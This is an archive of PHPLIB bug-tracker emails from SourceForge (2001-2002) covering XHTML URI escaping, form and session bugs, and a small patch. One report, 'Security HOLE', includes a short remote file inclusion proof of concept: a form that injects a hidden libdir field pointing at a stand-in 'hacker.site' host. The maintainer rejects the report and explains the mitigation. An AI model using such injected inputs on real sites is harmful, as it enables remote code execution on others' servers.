Bugs item #501788, was opened at 2002-01-10 15:11 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=501788&group_id=31885 Category: None Group: None Status: Closed Resolution: Rejected Priority: 5 Submitted By: Gaetano Giunta (ggiunta) Assigned to: Richard Archer (richardarcher) Summary: & char in URIs is invalid XHML Initial Comment: Intro: when writing XHTML docs the href attribute cannot ever contain the & char. So all URIs containing a query part with more than 1 params need to be rewritten using the & escape sequence (I tried it and it works!) Problem: the url(), self_url() etc... functions in phplib all use/search for only the & char as a query separator Suggestion: make new xurl(), xself_url(), ... functions, or modify existing ones... Thanks, Gaetano ---------------------------------------------------------------------- >Comment By: Gaetano Giunta (ggiunta) Date: 2002-03-20 11:49 Message: Logged In: YES user_id=114789 I know it sounds pretty funky, but I found it out while validating a phplib web site I was building (using w3c's own validator by means of the opera browser validate function). The main point is that the URI is specified as an attribute value. And XML forbids unescaped ampersands in attribute values (... seems like I cannot find reference to this assertion quicky anymore, so take it as my opinion only) Document references: XHTML 1.0 second edition draft, section C12 XML 1.0 second edition recommendation ---------------------------------------------------------------------- Comment By: Richard Archer (richardarcher) Date: 2002-01-14 21:25 Message: Logged In: YES user_id=279311 Are you sure the "&" character is not allowed? That would seem to me to be illogical. Example: in order to pass a parameter "tv=black&white" you need to escape the '&'. The XHTML spec at: http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd defines a URI as: <!ENTITY % URI "CDATA"> <!-- a Uniform Resource Identifier, see [RFC2396] --> RFC 2396 http://www.faqs.org/rfcs/rfc2396.html defines '&' as a reserved character. These may appear unescaped in URIs and indeed *must* not be escaped or the meaning of the URI may change. Perhaps the implementation of XHTML you're using is buggy? Otherwise, I'd appreciate a link to an XHTML spec that defines URI's differently! ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=501788&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 05:25:47
|
Bugs item #524783, was opened at 2002-03-03 01:02 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=524783&group_id=31885 Category: None Group: None >Status: Closed >Resolution: Rejected Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Richard Archer (richardarcher) Summary: Security HOLE Initial Comment: !!!Remote code execution !!! file: /pages/new_user_alt.php3 /pages/view_sessions.php3 /pages/showoff.php3 line: include($_PHPLIB["libdir"] . "table.inc"); example: <form method=POST action="http://phplib.sourceforge.net/showroom/view_ses sions.php3"> <input type=hidden name="_PHPLIB[libdir]" value="http://hacker.site/some_path/"> <input type=submit> versions tested: <7.4-pr1 tested, (and works) on http://phplib.sourceforge.net/ ---------------------------------------------------------------------- Comment By: Richard Archer (richardarcher) Date: 2002-03-03 12:12 Message: Logged In: YES user_id=279311 This is not a security flaw in PHPLIB. There was once a problem with _PHPLIB handling, but that was fixed back in July 2001 with the release of 7.2d. The "test cases" described are due to a broken installation of PHPLIB, not a flaw in the library. To avoid the possibility of remote code being executed on PHPLIB pages, prepend.php3 must be included at the start of any file which uses PHPLIB. It contains the lines: $_PHPLIB = array(); # Can't control your include path? # Point this to your PHPLIB base directory. Use a trailing "/"! $_PHPLIB["libdir"] = ""; This initialises the include path variable so that it cannot be overridden by crafted form input. Unless more convincing evidence of a problem is forthcoming, this bug report will be closed with no action taken. ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=524783&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 05:25:30
|
Bugs item #501788, was opened at 2002-01-11 01:11 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=501788&group_id=31885 Category: None Group: None >Status: Closed >Resolution: Rejected Priority: 5 Submitted By: Gaetano Giunta (ggiunta) >Assigned to: Richard Archer (richardarcher) Summary: & char in URIs is invalid XHML Initial Comment: Intro: when writing XHTML docs the href attribute cannot ever contain the & char. So all URIs containing a query part with more than 1 params need to be rewritten using the & escape sequence (I tried it and it works!) Problem: the url(), self_url() etc... functions in phplib all use/search for only the & char as a query separator Suggestion: make new xurl(), xself_url(), ... functions, or modify existing ones... Thanks, Gaetano ---------------------------------------------------------------------- Comment By: Richard Archer (richardarcher) Date: 2002-01-15 07:25 Message: Logged In: YES user_id=279311 Are you sure the "&" character is not allowed? That would seem to me to be illogical. Example: in order to pass a parameter "tv=black&white" you need to escape the '&'. The XHTML spec at: http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd defines a URI as: <!ENTITY % URI "CDATA"> <!-- a Uniform Resource Identifier, see [RFC2396] --> RFC 2396 http://www.faqs.org/rfcs/rfc2396.html defines '&' as a reserved character. These may appear unescaped in URIs and indeed *must* not be escaped or the meaning of the URI may change. Perhaps the implementation of XHTML you're using is buggy? Otherwise, I'd appreciate a link to an XHTML spec that defines URI's differently! ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=501788&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 05:24:15
|
Bugs item #496163, was opened at 2001-12-23 07:59 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=496163&group_id=31885 Category: None Group: None >Status: Closed >Resolution: Fixed Priority: 5 Submitted By: Nobody/Anonymous (nobody) >Assigned to: Richard Archer (richardarcher) Summary: on creating new user permissions Initial Comment: When a new user is created with pages/admin/new_user_md5.php3, the value 'Array' is written to database instead of the selected permissions. The problem is, that multiple permissions can be selected in the form, but when the HTTP_POST_VARIABLES are processed the varible $perms that is passed by CGI is treated as a normal variable. But it is an array! that holds multiple permissions. ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=496163&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 05:22:48
|
Bugs item #482372, was opened at 2001-11-16 15:05 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=482372&group_id=31885 Category: None Group: None >Status: Closed >Resolution: Fixed Priority: 5 Submitted By: Russell McOrmond (russellmcormond) >Assigned to: Layne Weathers (layne_weathers) Summary: problem in page.inc Initial Comment: phplib-7.2d , 7.2c (I upgraded to see if the upgrade would fix the problem) I just upgraded from PHP 4.0.4 to php 4.0.6 On my PHPSlash site I would get the following on the bottom of each page: Fatal error: Call to a member function on a non-object in /usr/share/phplib/page.inc on line 68 I am temporarily using the following patch which masks the problem, but I suspect something else is not properly happening at this point. --- page.inc Wed Jul 12 14:22:35 2000 +++ /usr/share/phplib/page.inc Thu Nov 15 22:54:52 2001 @@ -64,7 +64,7 @@ if (isset($sess)) { $sess->freeze(); - if (isset($user)) { + if (isset($user) && isset($user->freeze)) { $user->freeze(); } } ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=482372&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 05:20:52
|
Bugs item #473198, was opened at 2001-10-21 03:27 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=473198&group_id=31885 Category: None Group: None >Status: Closed >Resolution: Fixed Priority: 5 Submitted By: Andreas Stein (steinas) >Assigned to: Layne Weathers (layne_weathers) Summary: oohforms falg_ instead of flag_ Initial Comment: file: oohforms.inc method: get_element() line: 278 should be flag_name... instead of falg_ ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=473198&group_id=31885 |
115 messages has been excluded from this view by a project administrator.
